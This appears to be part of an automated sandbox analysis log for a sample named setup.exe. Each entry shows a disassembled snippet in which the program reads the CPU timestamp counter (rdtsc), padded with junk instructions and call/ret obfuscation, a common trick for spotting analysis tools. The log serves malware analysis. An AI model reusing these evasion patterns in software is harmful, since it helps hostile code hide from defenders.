Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E748F second address: 5E7516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2F04h], edx 0x00000011 movsx esi, bx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FC169461A98h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2A73h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FC169461A98h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jmp 00007FC169461A9Bh 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 push ecx 0x0000005a jmp 00007FC169461AA2h 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E7DBF second address: 5E7DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FC16945A278h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ECF49 second address: 5ECF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F0A26 second address: 5F0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F0B73 second address: 5F0B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F1B5A second address: 5F1B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F0B79 second address: 5F0B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F1C22 second address: 5F1C28 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F2CA5 second address: 5F2CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F2CAE second address: 5F2CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F3CA7 second address: 5F3CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F4C8C second address: 5F4CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 clc 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC16945A278h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cld 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FC16945A278h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov eax, dword ptr [ebp+122D0775h] 0x00000050 mov dword ptr [ebp+122D2610h], esi 0x00000056 push FFFFFFFFh 0x00000058 mov ebx, dword ptr [ebp+122D2C7Bh] 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 pop esi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F59F6 second address: 5F59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F4CFE second address: 5F4D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F59FF second address: 5F5A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F5A03 second address: 5F5A8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC16945A285h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FC16945A278h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c jnc 00007FC16945A27Ch 0x00000032 push edi 0x00000033 mov di, D5E1h 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a movzx ebx, si 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FC16945A278h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6AAB second address: 5F6AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA1h 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC169461A96h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F8ADD second address: 5F8AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE35 second address: 5ACE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FC169461A96h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6C93 second address: 5F6D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC16945A27Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC16945A278h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D2ACBh] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 pushad 0x00000038 jmp 00007FC16945A27Ch 0x0000003d add ebx, dword ptr [ebp+122D5B92h] 0x00000043 popad 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov ebx, dword ptr [ebp+122D2967h] 0x00000051 mov di, si 0x00000054 mov eax, dword ptr [ebp+122D0B71h] 0x0000005a sbb edi, 58034AD8h 0x00000060 push FFFFFFFFh 0x00000062 mov dword ptr [ebp+124587CDh], ebx 0x00000068 mov bh, E5h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 pop ecx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6D21 second address: 5F6D27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE4A second address: 5ACE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6D27 second address: 5F6D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE4F second address: 5ACE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC16945A276h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE5B second address: 5ACE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FA004 second address: 5FA00A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FA00A second address: 5FA02D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC169461A98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F93B3 second address: 5F93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FB27D second address: 5FB283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FC25C second address: 5FC260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FC260 second address: 5FC26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FF2DA second address: 5FF2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6020C4 second address: 6020CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6020CA second address: 6020DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jng 00007FC16945A282h 0x0000000c jns 00007FC16945A276h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 600207 second address: 60020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6002D7 second address: 6002E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6002E8 second address: 6002FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 609474 second address: 609496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007FC16945A287h 0x00000011 jmp 00007FC16945A27Fh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE86E second address: 5AE878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE878 second address: 5AE89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A281h 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE89A second address: 5AE8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE8A6 second address: 5AE8B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE8B0 second address: 5AE8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FC169461A96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA3h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F6A second address: 608F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A283h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F87 second address: 608F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F8C second address: 608F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F92 second address: 608FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FA1 second address: 608FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FA5 second address: 608FB1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FB1 second address: 608FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FB7 second address: 608FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CA95 second address: 64CAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CAA1 second address: 64CABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64F97C second address: 64F980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64F980 second address: 64F9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC169461AA3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FC68 second address: 64FC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FC6C second address: 64FC76 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FD93 second address: 64FD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FD97 second address: 64FDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jne 00007FC169461AB5h 0x00000014 js 00007FC169461A96h 0x0000001a jmp 00007FC169461AA9h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FDCD second address: 64FDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FF35 second address: 64FF3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FF3B second address: 64FF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FF41 second address: 64FF4B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC169461A9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 659FD9 second address: 659FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 659FE4 second address: 65A018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC169461AA5h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A310 second address: 65A316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A316 second address: 65A31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A31C second address: 65A339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 je 00007FC16945A276h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jp 00007FC16945A276h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A339 second address: 65A33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65A33D second address: 65A35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC16945A27Ch 0x0000000e jbe 00007FC16945A27Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65ACD5 second address: 65ACDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65ACDD second address: 65ACE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 65BBA3 second address: 65BBAD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 663058 second address: 663069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC16945A276h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 663069 second address: 66307F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC169461A9Fh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 662D8A second address: 662D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6661C7 second address: 6661CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F48F second address: 66F4A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC16945A278h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F4A8 second address: 66F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC169461A9Ch 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F4BB second address: 66F4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 66F4C2 second address: 66F4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 67F481 second address: 67F486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 67F306 second address: 67F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 67F310 second address: 67F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC16945A276h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855DC second address: 6855E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855E0 second address: 6855E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855E4 second address: 6855F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6855F2 second address: 6855F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
